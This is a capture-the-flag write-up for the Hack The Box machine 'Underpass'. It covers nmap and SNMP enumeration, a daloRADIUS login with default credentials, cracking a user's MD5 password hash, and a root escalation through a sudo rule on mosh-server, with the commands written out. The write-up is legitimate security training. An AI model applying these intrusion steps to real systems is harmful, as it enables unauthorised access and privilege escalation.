Easy
Underpass [20 pts]
| Challenge Description |
| Points: 20 |
| Solves: 5484 |
- network enumeration and SNMP information gathering reveal an HTTP service running daloRADIUS with default credentials
- credentials extracted from daloRADIUS allow further system access
- exploiting a misconfigured mosh server grants root access
Enumeration
We begin with an nmap scan, identifying two open TCP ports:
kali@kali:~/HTB/underpass $ nmap -sC -sV -oA nmap/underpass 10.10.11.48
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
The HTTP server was unresponsive, so we turned our attention to scanning UDP ports. Given the potential delay in full scans, we opted for the top 100 most common UDP ports:
kali@kali:~/HTB/underpass $ nmap -sU --top-ports 100 10.10.11.48
PORT STATE SERVICE
161/udp open snmp
1812/udp open|filtered radius
1813/udp open|filtered radacct
SNMP Information Gathering
The SNMP service was accessible, so we initiated a basic snmpwalk to enumerate available information:
snmpwalk -c public -v1 10.10.11.48 1 > snmpwalk.txt
The output revealed a wealth of details, including the hostname and a reference to UnDerPass.htb being a daloRADIUS server:
SNMPv2-MIB::sysName.0 = STRING: UnDerPass.htb is the only daloradius server in the basin!
SNMPv2-MIB::sysContact.0 = STRING: steve@underpass.htb
HTTP Enumeration
Assuming the HTTP server might host the daloRADIUS service, we navigated to http://underpass.htb/daloradius/ (after updating /etc/hosts). Directory enumeration revealed the following structure:
.gitignore [Status: 200]
app/ [Status: 301]
app/operators/ [Status: 301]
app/operators/login.php [Status: 200]
...
Default credentials (administrator/radius) worked for operators/login.php, providing access to the daloRADIUS dashboard.
Credential Discovery
In the dashboard, under the Management tab, we listed all users and discovered a user named svcMosh with the following credentials:
- Username:
svcMosh - Password (MD5 hash):
412DD4759978ACFCC81DEAB01B382403
Using CrackStation, we identified the password as underwaterfriends. With these credentials, we successfully SSH’d into the box:
Privilege Escalation
Examining sudo permissions for svcMosh revealed a direct path to escalate privileges:
User svcMosh may run the following commands on localhost:
(ALL) NOPASSWD: /usr/bin/mosh-server
Mosh is basically creating another shell on the remote computer, so If we create the mosh-server as root and connect to it, we can read the root flag. So we need to start the server:
svcMosh@underpass:~$ sudo /usr/bin/mosh-server
MOSH CONNECT 60002 /jTnrhTD4TnUg45eSJcNiA
mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
[mosh-server detached, pid = 1998]
From the Mosh documentation, the MOSH_KEY and mosh-client command were used to connect to the shell:
MOSH_KEY=/jTnrhTD4TnUg45eSJcNiA mosh-client 127.0.0.1 60002
Upon connection, we obtained root access and retrieved the root flag.